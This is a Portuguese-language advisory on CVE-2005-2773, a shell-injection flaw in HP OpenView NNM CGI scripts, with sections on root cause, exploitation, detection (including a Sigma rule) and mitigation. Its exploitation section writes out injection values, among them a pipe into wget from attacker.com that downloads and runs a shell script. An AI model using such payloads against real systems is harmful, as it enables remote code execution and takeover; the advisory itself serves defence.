CVE-2005-2773: Quando Sua Plataforma de Gerenciamento de Rede Se Torna a Linha de Comando do Atacante
Em segurança empresarial, a ironia mais cruel é quando a ferramenta que você implanta para *monitorar* sua rede se torna a ferramenta que um atacante usa para *dominá-la*.
CVSS: 9.8/10 (CRITICAL)
Affected: cpe:2.3:a:hp:openview_network_node_manager:*:*:*:*:*:*:*:* from 6.2
Available in English
CVE-2005-2773: Quando Sua Plataforma de Gerenciamento de Rede Se Torna a Linha de Comando do Atacante
Em segurança empresarial, a ironia mais cruel é quando a ferramenta que você implanta para monitorar sua rede se torna a ferramenta que um atacante usa para dominá-la. CVE-2005-2773 é exatamente esse tipo de vulnerabilidade—injeção de metacaracteres de shell embutida no HP OpenView NNM, uma das plataformas de gerenciamento de rede mais amplamente implantadas de sua era, executando com privilégios elevados e exposta à rede por design.
🎯 Impacto: Execução remota de comando não autenticada como o usuário do processo OpenView (tipicamente root/SYSTEM)
🔓 Vetor de Ataque: Rede (endpoints CGI acessíveis por HTTP)
💥 Exploração: Fácil — exploração em nível curl, sem autenticação necessária
🛡️ Correção Disponível: Sim — Boletim de Segurança HP SSRT061134
⏱️ Patch Agora: Sim — se houver qualquer instância legada do NNM 6.2–7.50 remanescente em seu ambiente
O Que Está Realmente Acontecendo
O ponto é esse sobre vulnerabilidades de injeção de shell—elas não existem porque desenvolvedores eram incompetentes. Elas existem porque passar dados para um shell era conveniente, e em 2005, a indústria de segurança ainda não havia coletivamente internalizado por que essa conveniência era catastrófica.
HP OpenView Network Node Manager expunha vários scripts CGI em Perl—connectedNodes.ovpl, cdpView.ovpl, freeIPaddrs.ovpl e ecscmg.ovpl—que aceitavam entrada fornecida pelo usuário via parâmetro node e passavam essa entrada diretamente (ou com sanitização insuficiente) para um comando de shell. A causa raiz é CWE-77: Improper Neutralization of Special Elements used in a Command.
O padrão vulnerável parece conceitualmente assim:
# Representação conceitual do padrão vulnerável — NÃO é um exploit funcional
my $node = $cgi->param('node'); # Entrada fornecida pelo usuário, não confiável
# Entrada passada diretamente para um comando de shell via backticks ou system()
my $output = `snmpwalk -c public $node`; # Shell interpreta metacaracteres!
print $output;
Quando $node contém metacaracteres de shell como ;, |, `, $(...) ou &&, o interpretador de shell não vê um nome de host—ele vê comandos adicionais. O operador backtick e as chamadas system() em Perl ambas invocam /bin/sh para analisar a string completa, significando que o payload do atacante é executado com os mesmos privilégios que o processo do servidor web rodando OpenView.
O que torna isso particularmente interessante é o contexto. O trabalho inteiro do NNM é conversar com dispositivos de rede—ele precisa rodar ferramentas SNMP, fazer ping em hosts, procurar vizinhos CDP. Os scripts que fazem esse trabalho estão inerentemente no negócio de pegar nomes de nós como entrada e fazer coisas com eles. A suposição de design—que o parâmetro node seria sempre um nome de host limpo ou endereço IP—nunca foi validada no limite de entrada.
Compare isso com a mesma classe de vulnerabilidade em scripts auxiliares do sendmail do início dos anos 2000, ou o infame padrão de CGI em bash que mais tarde alimentaria Shellshock (CVE-2014-6271). A superfície de ataque é diferente, mas a falha raiz é idêntica: confiança no formato de dados fornecidos pelo usuário que tocarão um interpretador de shell.
Caminho de Exploração
Pré-requisitos: Essencialmente nenhum. Nenhuma autenticação é necessária para acessar esses endpoints CGI em um deployment padrão do NNM. Acesso HTTP à porta 80 (ou 7510 em algumas configurações) é tudo que um atacante precisa.
Cadeia de ataque passo a passo:
-
Reconhecimento: Identifique uma instalação do NNM. A interface web tem títulos de página e padrões de URL distintos. Buscas de era Shodan em 2005 teriam retornado centenas de instâncias diretamente expostas à internet.
-
Targeting de endpoint: Qualquer um dos quatro scripts vulneráveis funciona.
connectedNodes.ovplé particularmente atrativo porque é designed para consultar topologia de rede—ele espera chamar binários externos. -
Injeção de payload: Um parâmetro
nodefabricado como127.0.0.1; idou127.0.0.1 | wget http://attacker.com/shell.sh -O /tmp/s && sh /tmp/sé passado para o shell. O ponto-e-vírgula ou pipe termina o comando legítimo e inicia o do atacante. -
Ganho imediato: Execução de comando como usuário do processo NNM. Em instalações Unix, OpenView tipicamente roda como root. No Windows, roda como uma conta de serviço privilegiada. De qualquer forma, é game over para aquele host.
-
Ganho estratégico: Isso não é apenas RCE em uma máquina—é RCE em sua plataforma de gerenciamento de rede. NNM tem credenciais, strings de comunidade SNMP e dados de topologia de rede para sua infraestrutura inteira. Um atacante que possui NNM possui o mapa de sua rede.
Quem Está Realmente Em Risco
A resposta honesta em 2025? Se você ainda está rodando NNM 6.2–7.50, você tem problemas maiores que este CVE específico—mas este CVE é uma ótima razão para auditar se aquelas instâncias legadas existem.
Os ambientes mais expostos foram (e ainda estariam, se presentes):
- Grandes redes empresariais e de operadoras — NNM era a escolha padrão para gerenciar milhares de nós. Telcos, ISPs e centros de operações de rede da Fortune 500 rodavam isso extensivamente.
- Interfaces de gerenciamento expostas à internet — Um número chocante de instalações do NNM eram acessíveis da internet em 2005. Plataformas de gerenciamento de rede não eram tratadas como joia da coroa como deveriam ter sido.
- Ambientes OT/Industriais — Alguns ambientes de tecnologia operacional que foram "modernizados" no final dos anos 1990 e início dos anos 2000 usavam OpenView para monitoramento de redes de plantas. Esses ambientes notoriamente ficam para trás em ciclos de patches.
Não tenho conhecimento de exploração pública confirmada em brechas específicas atribuídas a este CVE, mas a combinação de deployment amplo, sem requisito de autenticação e exploração trivial torna estatisticamente implausível que não tenha sido ativamente explorada antes (e provavelmente depois) da divulgação.
Detecção & Hunting
Se você está fazendo resposta a incidentes ou threat hunting em um ambiente que tinha NNM implantado, é assim que a exploração pareceria:
Logs do servidor web — Procure por caracteres incomuns no parâmetro node:
GET /OvCgi/connectedNodes.ovpl?node=127.0.0.1%3Bid HTTP/1.1
GET /OvCgi/cdpView.ovpl?node=localhost%7Cwhoami HTTP/1.1
Versões URL-encoded de ; (%3B), | (%7C), ` (%60) e $ (%24) no parâmetro node são seus indicadores primários.
Regra Sigma conceitual:
title: HP OpenView NNM Shell Metacharacter Injection Attempt
id: a1b2c3d4-0000-0000-0000-cve20052773xx
status: historical
description: Detects shell metacharacter injection attempts against vulnerable HP OpenView NNM CGI scripts
logsource:
category: webserver
detection:
selection:
cs-uri-stem|contains:
- '/OvCgi/connectedNodes.ovpl'
- '/OvCgi/cdpView.ovpl'
- '/OvCgi/freeIPaddrs.ovpl'
- '/OvCgi/ecscmg.ovpl'
cs-uri-query|contains:
- '%3B' # semicolon
- '%7C' # pipe
- '%60' # backtick
- '%24%28' # $(
- '&&'
- '||'
condition: selection
falsepositives:
- Unlikely in node parameter context
level: critical
Indicadores em nível de host: Processos filhos incomuns gerados pelo processo do servidor web do NNM (ovw, httpd ou o interpretador Perl)—particularmente shells, instâncias de wget, curl ou nc sem contexto legítimo do NNM.
Playbook de Mitigação
-
Imediato: Aplique o Boletim de Segurança HP SSRT061134 / patch para NNM 7.51 ou posterior. Se você não puder fazer patch imediatamente, leve a interface web do NNM offline ou restrinja-a a uma VLAN de gerenciamento via ACLs de firewall.
-
Curto prazo (se o patch for atrasado): Implante uma regra WAF bloqueando requisições para os quatro endpoints vulneráveis que contenham metacaracteres de shell em qualquer parâmetro. Validação de entrada no perímetro da rede é um band-aid, mas compra tempo.
-
Segmentação de rede: NNM nunca deve estar exposto à internet. Se estiver, essa é a primeira coisa a corrigir—independentemente deste CVE. Restrinja acesso HTTP a subnets de gerenciamento com allowlists explícitas de IP de origem.
-
Redução de privilégio: Revise o contexto de usuário em que NNM roda. Se for root ou SYSTEM, explore se pode operar sob uma conta de serviço dedicada com privilégios reduzidos. Isso não previne exploração mas limita o raio de blast.
-
Verificação: Após fazer patch, envie uma requisição de teste com um metacaractere benigno no parâmetro
node(ex:node=test%3Becho+patched) de um sistema de teste autorizado e confirme que retorna um erro ao invés de saída de comando.
Minha Análise
O CVSS 9.8 é acurado. Se qualquer coisa, o risco de negócio excede o que o score transmite, porque NNM não era apenas outra aplicação web—era uma plataforma privilegiada, confiável e consciente de rede sentada no centro da infraestrutura empresarial. RCE no NNM é RCE mais inteligência. Um atacante ganha não apenas um foothold mas uma compreensão detalhada da rede que acabou de entrar.
O que acho fascinante sobre essa vulnerabilidade de uma perspectiva histórica é como ela ilustra o "management plane blindspot" que persistiu em segurança empresarial bem até os anos 2010. Organizações gastaram enorme esforço endurecendo seu perímetro e seus endpoints enquanto deixavam plataformas de gerenciamento de rede—que tinha amplo acesso, alto privilégio e frequentemente exposição à internet—essencialmente desprotegidas. CVE-2005-2773 é um ponto de dados inicial em um padrão que exploração SNMP, vulnerabilidades de NMS e eventualmente o ataque da cadeia de suprimentos SolarWinds (2020) deixariam impossível de ignorar.
Se for ser honesto, a crítica da HP aqui não é que essa vulnerabilidade existisse—injeção de shell em scripts CGI era endêmica em 2005—é que o range de versão afetada abrange oito anos de releases de produto (6.2 através de 7.50), sugerindo que revisão de segurança desses scripts CGI nunca foi uma prioridade durante aquele inteiro período de desenvolvimento. Essa é uma falha de processo, não apenas uma falha de código.
Timeline
| Data | Evento |
|---|---|
| 2005 (est.) | Vulnerabilidade descoberta nos scripts CGI do HP OpenView NNM |
| 2005-08-XX | HP notificada; investigação interna começa |
| 2005-08-23 | CVE-2005-2773 atribuído |
| 2005-09-XX | HP lança patch (SSRT061134) e boletim de segurança |
| 2005-09-XX | Divulgação pública coordenada com lançamento de patch |
Datas exatas de descoberta e notificação não fazem parte do registro público para este CVE.
Referências
- CVE-2005-2773 — NVD — Entrada oficial do banco de dados de vulnerabilidades NIST com scoring CVSS
- CWE-77: Improper Neutralization of Special Elements in a Command — A classificação de fraqueza raiz para vulnerabilidades de injeção de shell
- HP OpenView Network Node Manager Product Page (archived) — Contexto histórico do produto
- OWASP Command Injection — Referência fundamental para compreender a classe de vulnerabilidade
- CVE-2014-6271 (Shellshock) — Uma vulnerabilidade posterior, de perfil mais alto na mesma família—útil para compreender por que essa classe de bug nunca realmente desapareceu